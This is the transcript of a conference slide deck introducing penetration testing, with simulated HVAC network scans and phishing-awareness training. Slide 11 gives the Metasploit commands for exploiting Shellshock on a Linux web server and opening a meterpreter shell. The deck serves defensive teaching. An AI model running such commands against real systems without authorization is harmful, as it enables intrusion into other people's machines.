Presentation is loading. Please wait.

Presentation is loading. Please wait.

Presenter: Robbie Corley Organization: KCTCS

Similar presentations


Presentation on theme: "Presenter: Robbie Corley Organization: KCTCS"— Presentation transcript:

1 Anatomy of a Pentest: Proactive steps to address vulnerabilities in your network
Presenter: Robbie Corley Organization: KCTCS Senior Information Security Analyst

2 About me Personal Life / Interests Married
Bachelor’s in Music Business??? Favorite Show: Seinfeld Favorite Movie(s): Lord of the Rings / Hobbit Trilogy Favorite Aspects of IT Security: Reverse Engineering / Studying Shellcode Finding and Exploiting Software Vulnerabilties

3 Let’s Talk About Pentesting
What is a pentest? A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan. How does it work? You are the attacker: You will use exploits custom tailored to target specific flagged vulnerabilities from your previous vulnerability scan

4 Let’s Talk About Pentesting
Some history on Pentesting… Pentesting originally required manually compiling each individual exploit to test a vulnerability, all of which were usually coded in different programming languages and specific to OS builds (XP sp1, XP sp2, etc) What’s the advantage over a Vulnerability Scan and why conduct one? A Vulnerability Scan merely lays out the foundation for your network risk assessment A Pentest helps you fortify your network by discovering and patching security holes before the attackers do and keeps your auditors happy, which also keeps your boss happy  Pentesting “weeds out” false positives from a Vulnerability Scan while also validating vulnerabilities

5 Conducting your first pentest
Our Goal: To Scan and Validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus) Other recommendations: Tenable Nessus Open Source: OpenVAS Why Rapid7? Exploits are pre-compiled and you do not need to go online to search for them. Readily available, built into the software Scanner and Pentesting software both free to try Software Resources Used: Nexpose Vulnerability Scan Solution Metasploit Pentesting Solution

6 HVAC system SCAN & Pentest simulation
Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network Attack Vectors used: Client Side and Web A Blind Scan? A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario HVAC Network Layout: HVAC A: Windows XP for server HVAC software: HVAC B: Linux Web Server for HVAC Web Services

7 HVAC server a: SCAN simulation
Vulnerability Scan Results using HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER

8 HVAC server A: pentest simulation
Pentest Live Demo using HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER

9 HVAC server B: SCAN simulation
Vulnerability Scan Results using HVAC B: IP: OS: Linux HVAC WEB SERVER Shellshock!!!!!!

10 HVAC server B: pentest simulation
Pentest Live Demo using HVAC B: IP: OS: Linux HVAC WEB SERVER

11 pentest SHELL COMMANDS USED
Commands used for future reference: To pull up web console, type : Alt +Tilde “~”, then… “use exploit/multi/http/apache_mod_cgi_bash_env_exec” “set RHOST ” (our victim box ip address) “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script) “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module) “run” Once in the compromised victim’s machine session, you can open a shell by simply typing “shell”. You will then be greeted with a linux shell 

12 USER awareness training PENTESTING USING social engineering MODULES
Why have User Awareness Training? Users can be more mindful of simple operations that can effectively help keep their documents and data safe We simply cannot monitor all of our users’ actions Hacker’s are keen on well structured network security, and seek out easier pathways of entry, i.e.: A phishing directed to an unsuspecting, un-training user On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure

13 USER awareness training PENTESTING USING social engineering PHISHING MODULES
How does it work? Phishing Modules use pre-made templates that resemble common Phishing s in the wild s can be tailored to re-direct users to informative phishing awareness videos upon the user interacting with a phishing What tools do I need? Easiest solution and what we will be using: SPTOOLKIT SPTOOLKIT is Opensource and requires little effort to setup Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a pro license

14 USER awareness training Phishing around with SPTOOLKIT
Demo time! Link: Requirements: SMTP server Any Linux OS box with Apache and MySQL installed Recommended approach: Install Kali Linux which has Apache and MySql installed and enabled by default Commands to start MYSQL and Apache: Service apache2 start Service mysql start

15 USER awareness training Phishing around with SPTOOLKIT

16 That’s all folks This presentation and its supplemental video and software content can be downloaded by using the following link: (Secure Google-Drive repository) Links to Resources outside of this repository: SPTOOLKIT Setup Guide: -> download Community edition of Metasploit and Nexpose -> Kali Linux to be used as a pentesting environment and for SPTOOLKIT Social Engineering Module Want to chat with me outside of this conference about more IT Security topics? Shoot me an at:

17 Questions???


Download ppt "Presenter: Robbie Corley Organization: KCTCS"

Similar presentations


Ads by Google